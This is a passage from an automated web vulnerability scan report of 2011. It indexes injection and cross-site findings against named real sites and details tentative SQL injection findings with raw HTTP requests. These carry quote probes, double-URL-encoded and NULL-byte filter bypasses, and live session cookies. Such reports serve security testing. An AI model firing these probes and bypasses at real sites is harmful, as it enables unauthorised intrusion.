3.293. http://sl5.cdn.fwix.com/tools/geotagger/infowindow.php [name of an arbitrarily supplied request parameter]

3.294. http://sl5.cdn.fwix.com/tools/geotagger/infowindow.php [target_url parameter]

3.295. http://sm8.sitemeter.com/js/counter.asp [site parameter]

3.296. http://sm8.sitemeter.com/js/counter.js [site parameter]

3.297. http://sm9.sitemeter.com/js/counter.asp [site parameter]

3.298. http://sm9.sitemeter.com/js/counter.js [site parameter]

3.299. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

3.300. http://stream.thenextweb.fyre.co/1872433/version/12952214/00C65D8C/ [REST URL parameter 1]

3.301. http://stream.thenextweb.fyre.co/1872433/version/12952214/00C65D8C/ [REST URL parameter 2]

3.302. http://stream.thenextweb.fyre.co/1872433/version/12952214/00C65D8C/ [REST URL parameter 3]

3.303. http://stream.thenextweb.fyre.co/livecountping/1872433/anonymous/kCNPRQKrwA/rooms.thenextweb.fyre.co/ [REST URL parameter 1]

3.304. http://tag.admeld.com/ad/js/434/admeld_fds_vc_tier2_cpm_octdec10/728x90/admeld_fds_vc_ron4 [hu parameter]

3.305. http://tag.admeld.com/ad/js/434/burstdirecttier1/300x250/admeld_fds_fc_ron6 [hu parameter]

3.306. http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/ [name of an arbitrarily supplied request parameter]

3.307. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

3.308. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

3.309. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

3.310. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

3.311. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

3.312. http://web.adblade.com/imps.php [description_color parameter]

3.313. http://web.adblade.com/imps.php [title_color parameter]

3.314. http://web.theplatform.com/crossdomain.xml [REST URL parameter 1]

3.315. http://web.theplatform.com/data/Reseller/mpx.txt [REST URL parameter 1]

3.316. http://web.theplatform.com/data/Reseller/mpx.txt [REST URL parameter 2]

3.317. http://web.theplatform.com/data/Reseller/mpx.txt [REST URL parameter 3]

3.318. http://web.theplatform.com/favicon.ico [REST URL parameter 1]

3.319. https://weblogin.bu.edu//web@login3 [br parameter]

3.320. https://weblogin.bu.edu//web@login3 [fl parameter]

3.321. https://weblogin.bu.edu//web@login3 [jsv parameter]

3.322. https://weblogin.bu.edu//web@login3 [name of an arbitrarily supplied request parameter]

3.323. https://weblogin.bu.edu/accounts/forgot [_authref parameter]

3.324. https://weblogin.bu.edu/accounts/forgot [_hostname parameter]

3.325. https://weblogin.bu.edu/web@login3 [br parameter]

3.326. https://weblogin.bu.edu/web@login3 [fl parameter]

3.327. https://weblogin.bu.edu/web@login3 [jsv parameter]

3.328. https://weblogin.bu.edu/web@login3 [name of an arbitrarily supplied request parameter]

3.329. http://www.bit9.com/resources/register/index.php [file parameter]

3.330. http://www.bit9.com/resources/register/index.php [level parameter]

3.331. https://www.bu.edu/phpbin/telegraph/ [comments parameter]

3.332. https://www.bu.edu/phpbin/telegraph/ [fund_other parameter]

3.333. https://www.fis.dowjones.com/article.aspx [s parameter]

3.334. http://www.hcp.com/2tor [REST URL parameter 1]

3.335. http://www.hcp.com/__utm.gif [REST URL parameter 1]

3.336. http://www.hcp.com/avidyne [REST URL parameter 1]

3.337. http://www.hcp.com/bob_amster [REST URL parameter 1]

3.338. http://www.hcp.com/dan_nova [REST URL parameter 1]

3.339. http://www.hcp.com/favicon.ico [REST URL parameter 1]

3.340. http://www.hcp.com/highland_backed_companies [REST URL parameter 1]

3.341. http://www.hcp.com/highland_extranet [REST URL parameter 1]

3.342. http://www.hcp.com/info_comm_technology [REST URL parameter 1]

3.343. http://www.hcp.com/sectors [REST URL parameter 1]

3.344. http://www.hcp.com/webos/blank.html [REST URL parameter 1]

3.345. http://www.hcp.com/webos/blank.html [REST URL parameter 2]

3.346. http://www.magnify.net/media/site/P8TH6404Q1P6NBW1/local_style.css [REST URL parameter 1]

3.347. http://www.meetup.com/birddog/widget_map.jsp [height parameter]

3.348. http://www.meetup.com/birddog/widget_map.jsp [height parameter]

3.349. http://www.meetup.com/birddog/widget_map.jsp [markers parameter]

3.350. http://www.meetup.com/birddog/widget_map.jsp [width parameter]

3.351. http://www.meetup.com/birddog/widget_map.jsp [width parameter]

3.352. http://www.mongodb.org/dosearchsite.action [queryString parameter]

3.353. http://www.mongodb.org/s/1627/3/4/_/styles/combined.css [spaceKey parameter]

3.354. http://www.mongodb.org/s/1627/3/5/_/styles/combined.css [spaceKey parameter]

3.355. http://www.mongodb.org/s/1627/3/6/_/styles/combined.css [spaceKey parameter]

3.356. http://www.nbcnewyork.com/i/dispatcher/ [zipCode parameter]

3.357. http://www.nbcnewyork.com/news/local/Helicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518.html [name of an arbitrarily supplied request parameter]

3.358. http://www.nbcnewyork.com/results/ [keywords parameter]

3.359. http://www.nbcnewyork.com/weather/ [name of an arbitrarily supplied request parameter]

3.360. http://www.nbcnewyork.com/weather/ [name of an arbitrarily supplied request parameter]

3.361. http://www.nbcnewyork.com/weather/ [zipCode parameter]

3.362. http://www.nbcnewyork.com/weather/ [zipCode parameter]

3.363. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [callback parameter]

3.364. http://www.skillshare.com/data/0/0/1/12/nyc [REST URL parameter 1]

3.365. http://www.wattpad.com/stories [REST URL parameter 1]

3.366. http://www.wattpad.com/stories/search/xss%20carbon [REST URL parameter 2]

3.367. http://www.wattpad.com/stories/search/xss%20carbon [REST URL parameter 3]

3.368. http://www.wattpad.com/user_signup [mtb_email parameter]

3.369. http://www.wattpad.com/user_signup [mtb_username parameter]

3.370. http://www.wattpad.com/user_signup [referral parameter]

3.371. http://www.wbur.org/arts-calendar/ [url parameter]

3.372. http://www.wbur.org/content/news/arts-culture [name of an arbitrarily supplied request parameter]

3.373. http://www.wbur.org/content/news/boston [name of an arbitrarily supplied request parameter]

3.374. http://www.wbur.org/content/news/economy-business [name of an arbitrarily supplied request parameter]

3.375. http://www.wbur.org/content/news/health [name of an arbitrarily supplied request parameter]

3.376. http://www.wbur.org/content/news/nation [name of an arbitrarily supplied request parameter]

3.377. http://www.wbur.org/content/news/politics [name of an arbitrarily supplied request parameter]

3.378. http://www.wbur.org/content/news/science-technology [name of an arbitrarily supplied request parameter]

3.379. http://www.wbur.org/content/news/sports [name of an arbitrarily supplied request parameter]

3.380. http://www.wbur.org/content/news/world [name of an arbitrarily supplied request parameter]

3.381. http://www.wbur.org/email-this [link parameter]

3.382. http://www.wbur.org/email-this [link parameter]

3.383. http://www.wbur.org/email-this [name of an arbitrarily supplied request parameter]

3.384. http://www.wbur.org/email-this [story parameter]

3.385. http://www.wbur.org/email-this [story parameter]

3.386. http://www.wbur.org/email-this [story parameter]

3.387. http://www.wbur.org/media-player [title parameter]

3.388. http://www.wbur.org/media-player [title parameter]

3.389. http://www.wbur.org/media-player [url parameter]

3.390. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

3.391. http://clientcentre.dstglobalsolutions.com/ [Referer HTTP header]

3.392. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [Referer HTTP header]

3.393. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [Referer HTTP header]

3.394. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [Referer HTTP header]

3.395. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [Referer HTTP header]

3.396. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [Referer HTTP header]

3.397. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

3.398. https://store.t-suite.telstra.com/jsdn/web/login/loginview.jsp [User-Agent HTTP header]

3.399. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

3.400. http://ar.voicefive.com/bmx3/broker.pli [UIDR cookie]

3.401. http://ar.voicefive.com/bmx3/broker.pli [ar_p108883753 cookie]

3.402. http://ar.voicefive.com/bmx3/broker.pli [ar_p109848095 cookie]

3.403. http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]

3.404. http://ar.voicefive.com/bmx3/broker.pli [ar_p117672109 cookie]

3.405. http://ar.voicefive.com/bmx3/broker.pli [ar_p119936314 cookie]

3.406. http://ar.voicefive.com/bmx3/broker.pli [ar_p120927104 cookie]

3.407. http://ar.voicefive.com/bmx3/broker.pli [ar_p63514475 cookie]

3.408. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

3.409. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

3.410. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

3.411. http://people.bu.edu/favicon.ico [REST URL parameter 1]

3.412. http://r.skimresources.com/api/ [skimGUID cookie]

3.413. http://sm9.sitemeter.com/js/counter.asp [IP cookie]

3.414. http://sm9.sitemeter.com/js/counter.js [IP cookie]

3.415. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_vi cookie]

3.416. https://weblogin.bu.edu/accounts/forgot [weblogin3 cookie]

3.417. https://weblogin.bu.edu/webnew/alumnew [weblogin3 cookie]

3.418. http://www.bu.edu/htbin/library/ezproxyLogin.pl [weblogin3 cookie]

3.419. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [pers_cookie_insert_nbc_blogs_80 cookie]

3.420. http://www.skillshare.com/data/0/0/1/12/nyc [YII_CSRF_TOKEN cookie]

3.421. http://www.wattpad.com/ [HAPSID cookie]

3.422. http://www.wattpad.com/stories [HAPSID cookie]

3.423. http://www.wattpad.com/stories/search/xss%20carbon [HAPSID cookie]

3.424. http://www.wattpad.com/user_signup [HAPSID cookie]



1. SQL injection  next
There are 53 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adj/interactive.wsj.com/blog_deals [id cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/interactive.wsj.com/blog_deals

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adj/interactive.wsj.com/blog_deals;u=****300x250,336x280********;;mc=b2pfreezone;tile=1;sz=300x250,336x280;ord=4052405240524052; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/blog_deals;u=****300x250,336x280********;;mc=b2pfreezone;tile=1;sz=300x250,336x280;ord=4052405240524052;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT'

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6955
Set-Cookie: id=cdf63f63c000025||t=1317849187|et=730|cs=002213fd488b3b0c75b2fab850; path=/; domain=.doubleclick.net; expires=Fri, 04 Oct 2013 21:13:07 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 04 Oct 2011 21:13:07 GMT
Date: Wed, 05 Oct 2011 21:13:07 GMT
Expires: Wed, 05 Oct 2011 21:13:07 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 30 17:11:10 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/interactive.wsj.com/blog_deals;u=****300x250,336x280********;;mc=b2pfreezone;tile=1;sz=300x250,336x280;ord=4052405240524052; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/blog_deals;u=****300x250,336x280********;;mc=b2pfreezone;tile=1;sz=300x250,336x280;ord=4052405240524052;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT''

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 3794
Set-Cookie: id=c9d66f63c000077||t=1317849188|et=730|cs=002213fd48fcd9706c1e93c832; path=/; domain=.doubleclick.net; expires=Fri, 04 Oct 2013 21:13:08 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 04 Oct 2011 21:13:08 GMT
Date: Wed, 05 Oct 2011 21:13:08 GMT
Expires: Wed, 05 Oct 2011 21:13:08 GMT
Cache-Control: private

document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Thu Sep 22 02:47:00 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...

1.2. http://ad.doubleclick.net/adj/interactive.wsj.com/blog_venturecapital [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/interactive.wsj.com/blog_venturecapital

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adj/interactive.wsj.com/blog_venturecapital;u=****300x250,336x280********;msrc=tech;;mc=b2pfreezone;tile=1;sz=300x250,336x280;ord=6098609860986098;&1%2527=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/blog_venturecapital;u=****300x250,336x280********;msrc=tech;;mc=b2pfreezone;tile=1;sz=300x250,336x280;ord=6098609860986098;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2045
Set-Cookie: id=c6565f63c0000b9||t=1317849164|et=730|cs=002213fd48dac6323075d6a244; path=/; domain=.doubleclick.net; expires=Fri, 04 Oct 2013 21:12:44 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 04 Oct 2011 21:12:44 GMT
Date: Wed, 05 Oct 2011 21:12:43 GMT
Expires: Wed, 05 Oct 2011 21:12:43 GMT
Cache-Control: private

document.write('<noscript>\n\n<body><div style=\"position:relative; z-index:1\" align=\"center\">\n\n<a href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/e%3B242487794%3B1-0%3B0%3B33081019%
...[SNIP]...
B%3Bmc%3Db2pfreezone%3Btile%3D1%3Bsz%3D300x250%2C336x280%3B%261%2527%3D1%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3fhttp://www.eyewonderlabs.com/ct2.cfm?ewbust=0&guid=0&ewadid=163720&eid=1559297&file=NOSCRIPTfailover.jpg&pnl=MainBanner&type=0&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&clkX=&clkY=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/e%3B242487794%3B1-0%3B0%3B33081019%3B4307-300/250%3B44
...[SNIP]...

Request 2

GET /adj/interactive.wsj.com/blog_venturecapital;u=****300x250,336x280********;msrc=tech;;mc=b2pfreezone;tile=1;sz=300x250,336x280;ord=6098609860986098;&1%2527%2527=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/blog_venturecapital;u=****300x250,336x280********;msrc=tech;;mc=b2pfreezone;tile=1;sz=300x250,336x280;ord=6098609860986098;
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 4112
Set-Cookie: id=c8a64f63c00007e||t=1317849165|et=730|cs=002213fd4848cb84b7b1758412; path=/; domain=.doubleclick.net; expires=Fri, 04 Oct 2013 21:12:45 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 04 Oct 2011 21:12:45 GMT
Date: Wed, 05 Oct 2011 21:12:45 GMT
Expires: Wed, 05 Oct 2011 21:12:45 GMT
Cache-Control: private

document.write('\n<!-- Copyright DoubleClick Inc., All rights reserved. -->\n<!-- This code was autogenerated @ Tue Jun 21 03:25:12 EDT 2011 -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...

1.3. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s37146793666761 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://om.dowjoneson.com
Path:   /b/ss/djglobal,djwsj/1/H.20.3/s37146793666761

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/djglobal,djwsj/1/H.20.3/s37146793666761?AQB=1&ndh=1&t=5/9/2011%2016%3A12%3A8%203%20300&vmt=44BD02B1&ce=UTF-8&ns=dowjones&pageName=WSJ_Dealjournalblog_home&g=http%3A//blogs.wsj.com/deals/&r=http%3A//blogs.wsj.com/venturecapital/%3Fmod%3Dtech&cc=USD&ch=Online%20Journal&server=http%3A//blogs.wsj.com&events=event12%2Cevent68&c1=Blogs&c2=WSJ_Markets&c3=WSJ_Blogs_Dealjournalblog&v4=WSJ_Dealjournalblog_home&c5=http%3A//blogs.wsj.com/deals/&c6=http%3A//blogs.wsj.com/deals/&c7=off&c8=WSJ%20Online&c9=free&v11=Online%20Journal&c13=blog_deals&c19=blogs_summaries&c22=WSJ_Blogs_Dealjournalblog&c23=2011-10-05%2008%3A04&c24=Edition_North_America_USA&v25=WSJ_Markets&c26=WSJ_Deals&c27=WSJ_free&v29=WSJ_Deals&v31=Wednesday&v32=16%3A00&v37=WSJ_Blogs_Dealjournalblog&c49=3&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1032&bh=890&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/deals/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D24C051D3C20-4000012D80000C3D[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 05 Oct 2011 21:18:22 GMT
Server: Omniture DC/2.0.0
Content-Length: 399
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/djglobal,djwsj/1/H.20.3/s37146793666761?AQB=1&ndh=1&t=5/9/2011%2016%3A12%3A8%203%20300&vmt=44BD02B1&ce=UTF-8&ns=dowjones&pageName=WSJ_Dealjournalblog_home&g=http%3A//blogs.wsj.com/deals/&r=http%3A//blogs.wsj.com/venturecapital/%3Fmod%3Dtech&cc=USD&ch=Online%20Journal&server=http%3A//blogs.wsj.com&events=event12%2Cevent68&c1=Blogs&c2=WSJ_Markets&c3=WSJ_Blogs_Dealjournalblog&v4=WSJ_Dealjournalblog_home&c5=http%3A//blogs.wsj.com/deals/&c6=http%3A//blogs.wsj.com/deals/&c7=off&c8=WSJ%20Online&c9=free&v11=Online%20Journal&c13=blog_deals&c19=blogs_summaries&c22=WSJ_Blogs_Dealjournalblog&c23=2011-10-05%2008%3A04&c24=Edition_North_America_USA&v25=WSJ_Markets&c26=WSJ_Deals&c27=WSJ_free&v29=WSJ_Deals&v31=Wednesday&v32=16%3A00&v37=WSJ_Blogs_Dealjournalblog&c49=3&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1032&bh=890&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BRemoting%20Viewer%3BNative%20Client%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: om.dowjoneson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/deals/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D24C051D3C20-4000012D80000C3D[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 05 Oct 2011 21:18:22 GMT
Server: Omniture DC/2.0.0
xserver: www371
Content-Length: 0
Content-Type: text/html


1.4. http://theplatform.com/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://theplatform.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=267669451.1746413117.1317840279.1317840279.1317840279.1; __utmc=267669451; __utmz=267669451.1317840279.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); exp_last_visit=1002505444; ReleasePID=9CpuQ5DYNOrS3IiA5kMEidXtOK4mfjBe; ReleaseDeliveryTime=1317840245889; exp_last_activity=1317865450; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fcorp%2Fsupport%2Ftrc_sign_in%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts%2Fproduct_detail%2Ftype%2Fmpx%2F%22%3B%7D; __utmb=267669451

ACT=19&XID=f4fb5e166e24cf647a00fb05a40e1eb477aeca3c&RP=search%2Fresults&NRP=search%26%2347%3Bnoresults&RES=&status=Featured%7COpen&weblog=Blog%7Cnews_and_events%7Cstatic_pages%7CProducts%7CSolutions%7
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:46:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: exp_last_activity=1317865616; expires=Thu, 04-Oct-2012 18:46:56 GMT; path=/
Content-Length: 1641
Connection: close
Content-Type: text/html

<html>
<head>

<title>Error</title>

<meta http-equiv='content-type' content='text/html; charset=utf-8' />


<style type="text/css">

body {
background-color:    #ffffff;
margin:                50px;
font-family
...[SNIP]...

Request 2

POST / HTTP/1.1
Host: theplatform.com
Proxy-Connection: keep-alive
Content-Length: 302
Cache-Control: max-age=0
Origin: http://theplatform.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
